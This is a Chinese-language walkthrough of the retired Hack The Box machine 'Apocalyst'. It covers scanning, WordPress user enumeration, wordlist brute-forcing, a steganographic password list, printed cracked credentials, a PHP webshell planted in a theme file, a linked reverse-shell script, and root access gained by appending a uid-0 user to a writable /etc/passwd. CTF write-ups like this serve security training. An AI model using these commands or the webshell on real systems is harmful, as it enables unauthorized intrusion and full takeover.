本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.46
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令
autorecon 10.10.10.46 -o ./apocalyst-autorecon
最终的扫描结果
发现开放了两个端口,访问web应用看看
然后根据上面扫描的结果中爆破的目录有很多,目标是个WordPress程序,访问到了其后台管理地址,这里刚开始是使用IP地址访问,发现目标地址会自动访问域名,所以就添加了本地hosts
echo "10.10.10.46 apocalyst.htb" | sudo tee -a /etc/hosts.
访问正常之后,先使用wpscan把目标存在的用户跑出来
wpscan --url http://apocalyst.htb/ -e
有了用户根据目标页面生成字典再跑一下
cewl -d 0 http://apocalyst.htb -w brutelist.txt
使用上面的字典跑一下WordPress的用户密码
wpscan --url http://apocalyst.htb --usernames falaraki --passwords ./brutelist.txt
遗憾的是没有跑出来密码,那么再回到开始再次跑目录,不过这次是使用上面得到的字典去跑
gobuster dir -u http://apocalyst.htb/ -w /home/kali/Downloads/htb/apocalyst/brutelist.txt -x php -o bmfx-apocalyst.gobusters -t 100 -f -l
上述跑出来显示长度和大小
根据上面跑出来的目录,经过大量访问测试,最终锁定目录/Rightiousness下访问得到的图片中使用了隐写术存放了密码字典
既然有类似字典的,那么再跑下WordPress的用户密码
wpscan --url http://apocalyst.htb --usernames falaraki --passwords ./list.txt
跑出了密码
| Username: falaraki, Password: Transclisiation
登录了到目标WordPress后台,发现跟之前的靶机blocky利用方式一样,具体如下
登录到目标WordPress程序找到路径/wp-content/themes/twentyseventeen/page.php 当然还有其他写webshell代码的位置,只要有权限写入即可,这里只是列举其中之一,写入如下php代码
if (isset($_GET[0])) { system($_GET[0]); }
访问 http://apocalyst.htb/wp-content/themes/twentyseventeen/page.php?0=id 即可远程执行命令
根据上面的操作原理,制作的如下一键反弹shell代码
https://github.com/nullarmor/hackthebox-exploits/blob/master/blocky/exploit.py (使用Python3执行)
也可以自己反弹shell
使用LinEnum.sh收集了提权相关的信息,发现/etc/passwd是含有写入的权限,直接添加一个uid为0的用户即可提权
bmfx:vElWaD/nKmUyw:0:0:root:/root:/bin/bash
